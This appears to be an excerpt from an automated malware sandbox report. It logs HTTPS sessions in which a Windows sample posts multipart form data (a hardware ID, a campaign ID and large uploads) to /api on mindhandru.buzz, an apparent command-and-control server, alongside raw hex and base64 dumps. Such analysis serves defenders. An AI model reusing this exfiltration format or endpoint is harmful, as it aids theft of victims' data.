                                                                                                                  2024-12-27 07:56:47 UTC169INData Raw: 47 6e 47 51 36 69 6c 33 69 33 2b 41 50 35 64 47 4c 41 63 45 38 74 68 36 59 61 30 68 57 42 76 54 65 51 57 47 47 47 6a 4e 6e 71 79 37 52 4c 43 71 58 64 4c 66 32 78 52 4b 74 39 64 49 6b 6c 43 51 4b 4d 67 51 66 43 41 5a 7a 36 4c 39 68 4d 4b 59 79 46 6d 72 4f 50 76 56 59 41 6f 64 38 6f 2b 50 34 4f 35 58 78 71 78 48 68 47 4c 35 4b 67 47 64 51 59 68 62 45 69 6c 6c 68 74 68 34 33 53 34 4d 58 2b 46 30 6d 70 7a 32 43 76 73 54 2f 6d 64 57 7a 4b 61 77 6b 36 7a 72 46 58 33 68 2f 4b 34 6e 43 61 57 32 6d 45 68 0d 0a
                                                                                                                  Data Ascii: GnGQ6il3i3+AP5dGLAcE8th6Ya0hWBvTeQWGGGjNnqy7RLCqXdLf2xRKt9dIklCQKMgQfCAZz6L9hMKYyFmrOPvVYAod8o+P4O5XxqxHhGL5KgGdQYhbEillhth43S4MX+F0mpz2CvsT/mdWzKawk6zrFX3h/K4nCaW2mEh
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 33 63 64 37 0d 0a 64 62 67 78 37 39 56 42 36 6e 53 4b 66 2f 35 47 4f 70 2b 5a 4d 68 7a 52 69 53 45 72 52 4c 64 46 49 36 38 50 39 59 62 4b 59 79 52 6d 72 4f 50 6b 58 34 38 37 50 59 61 74 2b 35 45 38 6a 70 72 78 54 30 52 5a 59 79 72 47 39 45 63 6a 4c 4d 38 6e 46 78 69 68 34 4c 65 35 38 61 37 58 77 69 72 30 69 48 7a 2f 51 44 74 65 57 2f 47 63 6b 59 74 77 4f 5a 58 33 67 76 4b 34 6e 43 7a 51 6d 4b 46 6a 35 72 30 67 61 63 5a 44 71 4b 58 65 4c 66 39 41 2b 31 38 61 63 56 38 54 79 32 46 6f 42 50 59 46 59 79 35 50 35 4a 51 61 49 53 4e 31 75 58 46 76 31 67 46 70 64 67 72 38 72 46 45 71 33 31 30 69 53 55 4a 46 49 4f 2b 41 4d 6b 66 79 71 56 2b 6a 78 56 75 68 38 6d 43 71 38 36 73 55 77 4f 67 30 69 2f 79 38 67 58 73 64 32 72 46 64 30 41 74 68 71 63 65 79 78 43 47 74 44
                                                                                                                  Data Ascii: 3cd7dbgx79VB6nSKf/5GOp+ZMhzRiSErRLdFI68P9YbKYyRmrOPkX487PYat+5E8jprxT0RZYyrG9EcjLM8nFxih4Le58a7Xwir0iHz/QDteW/GckYtwOZX3gvK4nCzQmKFj5r0gacZDqKXeLf9A+18acV8Ty2FoBPYFYy5P5JQaISN1uXFv1gFpdgr8rFEq310iSUJFIO+AMkfyqV+jxVuh8mCq86sUwOg0i/y8gXsd2rFd0AthqceyxCGtD
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 69 35 76 56 37 4d 69 33 55 68 75 6b 30 43 66 38 2b 51 48 6b 66 48 37 46 63 31 73 67 6b 72 70 58 6c 31 4f 4e 6f 6e 44 4f 46 56 2b 4d 6d 63 72 6f 6a 59 39 50 43 72 6a 63 4c 66 75 78 46 61 56 6a 4c 4d 35 78 43 58 33 41 72 68 6a 51 45 49 57 37 4f 5a 70 59 62 49 4b 4d 32 2b 33 4c 74 46 4d 4a 71 4e 45 68 38 76 73 4a 36 6e 42 6c 7a 6e 56 4f 4a 70 4c 6f 57 5a 6b 55 6b 76 70 6f 31 6e 78 75 6d 59 66 4b 71 39 44 77 51 45 6d 70 32 32 43 76 73 51 37 68 64 57 6a 4f 63 55 38 67 68 71 55 57 31 68 4b 4b 74 54 53 64 58 47 2b 4b 68 4e 2f 6d 79 36 78 54 41 71 48 62 4b 66 76 38 53 71 55 36 61 39 45 39 45 57 57 78 70 52 6e 58 46 4a 7a 36 4c 39 68 4d 4b 59 79 46 6d 72 4f 50 76 31 55 47 72 64 67 6a 39 50 41 41 2b 57 68 67 77 48 56 4d 4b 59 75 6d 45 63 73 56 68 62 4d 7a 6c 56 78
                                                                                                                  Data Ascii: i5vV7Mi3Uhuk0Cf8+QHkfH7Fc1sgkrpXl1ONonDOFV+MmcrojY9PCrjcLfuxFaVjLM5xCX3ArhjQEIW7OZpYbIKM2+3LtFMJqNEh8vsJ6nBlznVOJpLoWZkUkvpo1nxumYfKq9DwQEmp22CvsQ7hdWjOcU8ghqUW1hKKtTSdXG+KhN/my6xTAqHbKfv8SqU6a9E9EWWxpRnXFJz6L9hMKYyFmrOPv1UGrdgj9PAA+WhgwHVMKYumEcsVhbMzlVx
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 4b 76 65 75 55 68 4a 39 73 45 77 34 50 59 56 70 57 4d 73 7a 6e 45 4a 66 63 43 75 48 74 38 55 6a 4c 51 69 6b 31 4e 6d 68 49 44 54 37 38 65 39 57 51 32 71 30 43 58 30 2f 51 48 73 65 57 50 4e 64 45 63 73 6a 2b 68 5a 6d 52 53 53 2b 6d 6a 57 64 48 4b 49 68 64 65 72 30 50 42 41 53 61 6e 62 59 4b 2b 78 42 75 56 2f 62 4d 4e 37 54 53 43 47 6f 68 4c 5a 47 49 6d 31 4e 4a 42 52 5a 6f 75 43 30 2b 72 4a 75 31 4d 43 71 4e 6f 6a 38 66 64 4b 70 54 70 72 30 54 30 52 5a 61 43 7a 47 74 55 55 79 71 56 2b 6a 78 56 75 68 38 6d 43 71 38 53 79 58 51 36 75 32 69 50 2f 39 41 37 68 66 32 7a 42 62 30 45 6c 68 37 6f 46 32 52 71 50 74 6a 4f 57 55 57 2b 43 6a 39 6e 76 6a 2f 41 5a 44 72 61 58 65 4c 66 63 42 75 78 54 61 39 49 39 56 6d 75 5a 36 42 44 56 55 39 4c 36 4d 5a 31 66 5a 6f 61 4b
                                                                                                                  Data Ascii: KveuUhJ9sEw4PYVpWMsznEJfcCuHt8UjLQik1NmhIDT78e9WQ2q0CX0/QHseWPNdEcsj+hZmRSS+mjWdHKIhder0PBASanbYK+xBuV/bMN7TSCGohLZGIm1NJBRZouC0+rJu1MCqNoj8fdKpTpr0T0RZaCzGtUUyqV+jxVuh8mCq8SyXQ6u2iP/9A7hf2zBb0Elh7oF2RqPtjOWUW+Cj9nvj/AZDraXeLfcBuxTa9I9VmuZ6BDVU9L6MZ1fZoaK
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 38 5a 55 5a 66 4f 59 4f 47 78 55 72 6b 30 4c 4e 73 39 45 57 58 48 71 77 58 4c 46 59 6d 73 4d 39 46 72 56 36 79 66 30 4f 7a 66 75 55 34 47 37 70 6c 67 2b 4c 46 53 30 6a 70 6c 7a 6d 5a 59 4d 34 32 34 45 4a 6b 73 78 50 6f 6f 31 67 30 70 76 6f 72 55 35 63 69 6f 53 45 53 4a 77 53 72 77 34 51 33 38 64 53 79 48 50 55 39 6c 32 50 74 5a 6d 52 65 62 2b 6d 6a 47 42 7a 4c 65 32 6f 32 37 6e 61 45 58 45 4f 37 42 59 4b 2b 6a 52 4b 74 6f 4c 4a 45 39 44 69 61 53 75 68 48 61 42 59 6e 39 44 71 68 79 63 34 61 50 7a 66 72 78 67 46 34 54 6f 39 45 33 35 72 30 66 36 48 52 69 7a 6d 73 4a 61 38 43 6e 56 34 45 71 79 76 4a 77 71 52 73 70 6b 38 6d 43 71 2f 71 39 56 77 65 70 77 54 47 36 31 68 44 6d 66 48 76 59 50 51 64 6c 68 75 68 50 69 56 33 4b 76 69 48 57 44 54 6e 5a 30 6f 2b 34 6d
                                                                                                                  Data Ascii: 8ZUZfOYOGxUrk0LNs9EWXHqwXLFYmsM9FrV6yf0OzfuU4G7plg+LFS0jplzmZYM424EJksxPoo1g0pvorU5cioSESJwSrw4Q38dSyHPU9l2PtZmReb+mjGBzLe2o27naEXEO7BYK+jRKtoLJE9DiaSuhHaBYn9Dqhyc4aPzfrxgF4To9E35r0f6HRizmsJa8CnV4EqyvJwqRspk8mCq/q9VwepwTG61hDmfHvYPQdlhuhPiV3KviHWDTnZ0o+4m
                                                                                                                  2024-12-27 07:56:47 UTC1369INData Raw: 68 36 52 37 69 38 67 54 6c 66 58 72 59 50 51 64 6c 6a 2b 68 50 34 46 50 43 2b 67 2f 59 46 58 48 4c 30 5a 72 65 7a 4c 42 58 44 72 6a 47 62 64 44 2f 44 65 70 73 66 4e 35 79 43 57 76 41 72 6c 65 42 51 63 54 36 4e 49 63 56 4d 64 76 62 67 62 36 63 36 51 6c 62 73 5a 6b 35 74 2b 64 4b 73 79 67 69 69 57 38 4a 66 63 44 76 46 4d 73 42 6a 4c 6b 6d 6c 52 4a 58 74 61 37 55 37 4d 36 6f 53 52 36 68 6d 41 37 42 30 44 54 56 62 32 2f 48 63 30 34 7a 6b 65 68 5a 6d 52 7a 4b 34 67 6e 57 48 53 6d 30 78 35 72 7a 6a 2b 59 5a 50 4b 33 5a 4c 76 44 6e 47 36 5a 64 59 73 35 38 58 7a 57 58 70 31 6a 33 4a 61 76 36 66 74 5a 54 4b 64 50 62 6c 4b 76 4c 72 78 6c 52 2f 6f 56 37 6f 71 4a 64 75 79 68 7a 68 32 51 4a 4d 38 44 77 52 5a 64 54 6d 50 70 6f 31 68 4a 71 6d 5a 76 63 36 4e 6d 39 48 6a
                                                                                                                  Data Ascii: h6R7i8gTlfXrYPQdlj+hP4FPC+g/YFXHL0ZrezLBXDrjGbdD/DepsfN5yCWvArleBQcT6NIcVMdvbgb6c6QlbsZk5t+dKsygiiW8JfcDvFMsBjLkmlRJXta7U7M6oSR6hmA7B0DTVb2/Hc04zkehZmRzK4gnWHSm0x5rzj+YZPK3ZLvDnG6ZdYs58XzWXp1j3Jav6ftZTKdPblKvLrxlR/oV7oqJduyhzh2QJM8DwRZdTmPpo1hJqmZvc6Nm9Hj


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.749701172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:49 UTC273OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=PNPROZ0RYU
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 12796
                                                                                                                  Host: mindhandru.buzz
                                                                                                                  2024-12-27 07:56:49 UTC12796OUTData Raw: 2d 2d 50 4e 50 52 4f 5a 30 52 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 41 34 44 31 39 30 42 32 39 43 34 42 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 4e 50 52 4f 5a 30 52 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4e 50 52 4f 5a 30 52 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 50 4e 50 52 4f 5a 30 52 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                  Data Ascii: --PNPROZ0RYUContent-Disposition: form-data; name="hwid"E7A4D190B29C4B72BEBA0C6A975F1733--PNPROZ0RYUContent-Disposition: form-data; name="pid"2--PNPROZ0RYUContent-Disposition: form-data; name="lid"PsFKDg--pablo--PNPROZ0RYUContent-
                                                                                                                  2024-12-27 07:56:50 UTC1129INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 07:56:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=m2tkl9464b43umpbf2ijaljabo; expires=Tue, 22 Apr 2025 01:43:28 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BftCoN%2BQKUZUcEDtClACVnxfNLYGxBH4K6oUm%2BJg5wT48Jau7kkQLJl7ghNx6XCR15BQsve8Ay%2F6S5XAoRLizQ9dVdxm7laJShfyEXeQV6W1uEI7psPPHn1qfUUzdzY4sL8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f87c1983a7c5e7d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=624&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13727&delivery_rate=1736028&cwnd=227&unsent_bytes=0&cid=e6b5c8bddba31ce6&ts=934&x=0"
                                                                                                                  2024-12-27 07:56:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-27 07:56:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.749703172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:51 UTC278OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=EDFZHD0QP9Z0339
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 15058
                                                                                                                  Host: mindhandru.buzz
                                                                                                                  2024-12-27 07:56:51 UTC15058OUTData Raw: 2d 2d 45 44 46 5a 48 44 30 51 50 39 5a 30 33 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 41 34 44 31 39 30 42 32 39 43 34 42 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 44 46 5a 48 44 30 51 50 39 5a 30 33 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 44 46 5a 48 44 30 51 50 39 5a 30 33 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 44 46 5a 48
                                                                                                                  Data Ascii: --EDFZHD0QP9Z0339Content-Disposition: form-data; name="hwid"E7A4D190B29C4B72BEBA0C6A975F1733--EDFZHD0QP9Z0339Content-Disposition: form-data; name="pid"2--EDFZHD0QP9Z0339Content-Disposition: form-data; name="lid"PsFKDg--pablo--EDFZH
                                                                                                                  2024-12-27 07:56:52 UTC1121INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 07:56:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=5rghv9m4jpqcusfr0kgboo601s; expires=Tue, 22 Apr 2025 01:43:30 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cJQinjoHBa2Xx6oS5o1dLec06d13Qvb4ADG5aF6sPAikfOlL42eTHx7rlPYbebco1skjU0nhTcJ7ZQLy1GtB3GtxihDhay2gAAIGMyQDknqLx6jKWUmPblkNZHUKZrbRTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f87c1a63f8178db-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1784&rtt_var=690&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15994&delivery_rate=1563169&cwnd=237&unsent_bytes=0&cid=ec91a069a8502af5&ts=810&x=0"
                                                                                                                  2024-12-27 07:56:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-27 07:56:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.749709172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:53 UTC278OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=G4BWS4NU6UPZBKO
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 20383
                                                                                                                  Host: mindhandru.buzz
                                                                                                                  2024-12-27 07:56:53 UTC15331OUTData Raw: 2d 2d 47 34 42 57 53 34 4e 55 36 55 50 5a 42 4b 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 41 34 44 31 39 30 42 32 39 43 34 42 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 34 42 57 53 34 4e 55 36 55 50 5a 42 4b 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 34 42 57 53 34 4e 55 36 55 50 5a 42 4b 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 47 34 42 57 53
                                                                                                                  Data Ascii: --G4BWS4NU6UPZBKOContent-Disposition: form-data; name="hwid"E7A4D190B29C4B72BEBA0C6A975F1733--G4BWS4NU6UPZBKOContent-Disposition: form-data; name="pid"3--G4BWS4NU6UPZBKOContent-Disposition: form-data; name="lid"PsFKDg--pablo--G4BWS
                                                                                                                  2024-12-27 07:56:53 UTC5052OUTData Raw: 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00
                                                                                                                  Data Ascii: X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                  2024-12-27 07:56:54 UTC1127INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 07:56:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=gkoemnpfn1608ribihtt0gu76e; expires=Tue, 22 Apr 2025 01:43:33 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCmcwqwgplMvbhQzKlsZlhIqM5xIHEIJMEt5M6labQTbT%2FW5tJ1ZY492pIgHPDjtYK1fH6cCtMYtzfIuO9EOifilg1b%2FJcUU7QyOLSWBHQ6XzDM%2B9YVYmcAEpIzX73WQ4OY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f87c1b49f6043e0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2104&min_rtt=2090&rtt_var=812&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21341&delivery_rate=1324263&cwnd=247&unsent_bytes=0&cid=1271e7c0ad3a06d5&ts=943&x=0"
                                                                                                                  2024-12-27 07:56:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-27 07:56:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.749715172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:56 UTC270OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=28X9CBWL
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 1159
                                                                                                                  Host: mindhandru.buzz
                                                                                                                  2024-12-27 07:56:56 UTC1159OUTData Raw: 2d 2d 32 38 58 39 43 42 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 41 34 44 31 39 30 42 32 39 43 34 42 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 38 58 39 43 42 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 38 58 39 43 42 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 38 58 39 43 42 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                  Data Ascii: --28X9CBWLContent-Disposition: form-data; name="hwid"E7A4D190B29C4B72BEBA0C6A975F1733--28X9CBWLContent-Disposition: form-data; name="pid"1--28X9CBWLContent-Disposition: form-data; name="lid"PsFKDg--pablo--28X9CBWLContent-Disposit
                                                                                                                  2024-12-27 07:56:57 UTC1126INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 07:56:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=af5u8uu7hqm05rj0f3ghi7oae9; expires=Tue, 22 Apr 2025 01:43:36 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MmI7RacnU16oBSjirWR562tIs1BRpfrUIrBlZWcvHuygDRZAcU1xkHkbm8P6M1Yb4EwmiB%2BkGhLlc2k3QsGw1ursr%2BqCO4ae3ujJnYGA%2Frn%2Fx4AcqjZR2JnoGeqM8eaU9U4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f87c1c72c1842f5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1576&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2065&delivery_rate=1753753&cwnd=195&unsent_bytes=0&cid=a925c53285d36411&ts=782&x=0"
                                                                                                                  2024-12-27 07:56:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-27 07:56:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.749723172.67.165.1854433592C:\Users\user\Desktop\cFLK1CiiNK.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-27 07:56:59 UTC278OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=NQADJPVE510BPD
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 552698
                                                                                                                  Host: mindhandru.buzz
